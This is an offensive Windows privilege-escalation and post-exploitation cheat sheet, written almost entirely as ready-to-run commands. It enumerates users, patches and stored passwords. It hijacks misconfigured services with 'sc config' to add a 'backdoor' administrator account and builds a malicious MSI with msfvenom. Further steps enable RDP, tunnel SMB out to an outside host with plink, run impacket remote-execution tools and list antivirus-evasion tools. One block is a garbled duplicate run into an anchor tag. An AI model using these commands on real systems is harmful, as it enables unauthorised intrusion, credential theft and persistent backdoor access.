Basic Host Information (Kernel Exploits etc. etc.)
ver
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
tasklist /v
c:\windows\system32\license.rtf
c:\windows\system32\eula.txt
wmic os get Caption, CSDVersion /value
Find user information
whoami
echo %username%
net user
net user (username)
echo %userprofile%
net localgroup
net config Workstation | find "User name"
query user
wmic useraccount get name
wmic /node: "127.0.0.1" computersystem get username
qwinsta
cmdkey /list
Learn about your ENV and what you have access to
SET
net
Check Domains and Domain Info
net view /domain
net view /domain:THINC
net localgroup “Administrators”
net group "Domain Admins" /domain
net share
net session | find / "\\"
What’s going on with the network could benefit you now or later
ipconfig /all
route print
arp -A
netstat -ano
Perform User Enumeration
whoami
echo %username%
net user
net user (username)
echo %userprofile%
net localgroup
net config Workstation | find "User name"
query user
wmic useraccount get name
wmic /node: "127.0.0.1" computersystem get username
qwinsta
reg.exe query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\WinLogon" /v DefaultUserName
reg.exe query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\WinLogon" /v DefaultPassword
Perform low level Password Enumeration
cmdkey /list
Simple File Search:
dir /s *password*
findstr /s /n /i /p password *
findstr /si password *.txt
dir /s *secret*
findstr /s /n /i /p secret *
findstr /si secret *.txt
Check installed programs, permissions, and hidden files:
dir /q
dir /r
attrib -h *.*
wmic /node: "127.0.0.1" product get name, version
wmic product get /format:list
Check Cron Jobs
schtasks /query
schtasks /query /v /fo LIST
Get-ScheduledTask | Where State -EQ 'Ready'
Check for Patch Levels
systeminfo
wmic qfe get Caption,Description,HotFixID,InstalledOn
Notes
Look for privilege escalation exploits and look up their respective KB patch numbers. Such exploits include, but are not limited to, KiTrap0D (KB979682), MS11-011 (KB2393802), MS10-059 (KB982799), MS10-021 (KB979683), MS11- 080 (KB2592799)
After enumerating the OS version and Service Pack you should find out which privilege escalation vulnerabilities could be present. Using the KB patch numbers you can grep the installed patches to see if any are missing
Search patches for given patch
wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.."
Find writable files (Use with Cron,Scheduled tasks, Program Files running under ADmin)
dir /a-r-d /s /b
Notes
/a is to search for attributes. In this case r is read only and d is directory. The minus signs negate those attributes. So we're looking for writable files only.
/s means recurse subdirectories
/b means bare format. Path and filename only.
Check Permissions of Program Files / x86 executables / Cron Executables
icacls.exe
Notes
Use writable executable to elevate permissions by creating backdoor or reverse shell
Trusted Service Paths (Unquoted Service path, execute local program first.. look for services paths executing as priv user..)
List all unquoted service paths (minus built-in Windows services) on our compromised machine:
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
Suppose we found:
C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe
If you look at the registry entry for this service with Regedit you can see the ImagePath value is:
C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe
To be secure it should be like this:
“C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe”
When Windows attempts to run this service, it will look at the following paths in order and will run the first EXE that it will find:
C:\Program.exe
C:\Program Files.exe
C:\Program Files(x86)\Program Folder\A.exe
…
Check permissions of folder path
icacls "C:\Program Files (x86)\Program Folder"
If we can write in the path we plant a backdoor with the same name with the service and restart the service.
Metasploit module:
exploit/windows/local/trusted_service_path
Check for Vulnerable Services
https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -qdws "Authenticated Users" C:\Windows\ /accepteula
accesschk.exe -qdws Users C:\Windows\
Then query the service using Windows sc:
sc qc <vulnerable service name>
Then change the binpath to execute your own commands (restart of the service will most likely be needed):
sc config <vuln-service> binpath= "net user backdoor backdoor123 /add"
sc stop <vuln-service>
sc start <vuln-service>
sc config <vuln-service> binpath= "net localgroup Administrators backdoor /add"
sc stop <vuln-service>
sc start <vuln-service>
Note - Might need to use the depend attribute explicitly:
sc stop <vuln-service>
sc config <vuln-service> binPath= "c:\inetpub\wwwroot\runmsf.exe" depend= "" start= demand obj= ".\LocalSystem" password= ""
sc start <vuln-service>
Metasploit module:
exploit/windows/local/service_permissions
<a href="https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exeaccesschk.exe -uwcqv "Authenticated Users" * /accepteulaaccesschk.exe -qdws "Authenticated Users" C:\Windows\ /accepteulaaccesschk.exe -qdws Users C:\Windows\Then query the service using Windows sc: sc qc <vulnerable service name>Then change the binpath to execute your own commands (restart of the service will most likely be needed): sc config <vuln-service> binpath= "net user backdoor backdoor123 /add" sc stop <vuln-service>sc start <vuln-service>sc config <vuln-service> binpath= "net localgroup Administrators backdoor /add" sc stop <vuln-service>sc start <vuln-service>Note - Might need to use the depend attribute explicitly: sc stop <vuln-service>sc config <vuln-service> binPath= "c:\inetpub\wwwroot\runmsf.exe" depend= "" start= demand obj= ".\LocalSystem" password= ""sc start
OTHER
Search for common files with default/cleatext creds
- dir /b /s unattend.xml
- dir /b /s web.config
- dir /b /s sysprep.inf
Grep the registry for keywords (e.g. “passwords”)
- reg query HKLM /f password /t REG_SZ /s
- reg query HKCU /f password /t REG_SZ /s
- reg query “HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon”
- reg query “HKLM\SYSTEM\Current\ControlSet\Services\SNMP”
- reg query “HKCU\Software\SimonTatham\PuTTY\Sessions”
- reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password
AlwaysInstallElevated
- AlwaysInstallElevated is a setting that allows non-privileged users the ability to run Microsoft Windows Installer Package Files (MSI) with elevated (SYSTEM) permissions. Check if these 2 registry values are set to “1”:
- reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
- reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
- If they are, create your own malicious msi:
- msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi -o evil.msi
- Then use msiexec on victim to execute your msi:
- msiexec /quiet /qn /i C:\evil.msi
- Metasploit module:
- exploit/windows/local/always_install_elevated
Post Exploit / Backdoor Commands
- Add Users
- net user username password /add
- net localgroup Administrators username /add
- net localgroup “Remote Desktop Users” username /add
- psexec.exe -accepteula \\10.11.10.167 -u hostname\username -p password cmd /c ipconfig
- RunAs
- runas /user:hostname\<username> explorer.exe
- Disable Firewall
- netsh firewall show state
- netsh firewall show config
- netsh advfirewall firewall show rule all
- RDP
- Enable RDP
- reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f
- Old RDP ker cred login bullshit
- reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /v UserAuthentication /t REG_DWORD /d 0 /f
- Local Remote port forward Plink (Use to tunnel out RDP, SMB, etc. etc.)
- plink.exe -l <user> -pw <password> 10.11.0.70 -R 9595:localhost:445
- Enable RDP
- Post Exploit Command and Control Examples (Avoid malware etc etc. )
- dcomexec.py username:password@10.11.10.167 dir
- psexec.py username:password@10.11.10.167 net user
- ./smbexec.py username:password@192.168.1.103
- ByPass AV
- veil-evasion
- crypters
- hyperion.exe
Exploit Suggesters / Priv Esc Helpers
- /var/www/tmp/linux-exploit-suggester.sh
- /var/www/tmp/windows-privesc-check2.exe
- /usr/bin/unix-privesc-check
- windows-exploit-suggester.py
- https://github.com/breenmachine/RottenPotatoNG
- https://www.blackhillsinfosec.com/a-toast-to-kerberoast/
- https://www.kali.org/penetration-testing/passing-hash-remote-desktop/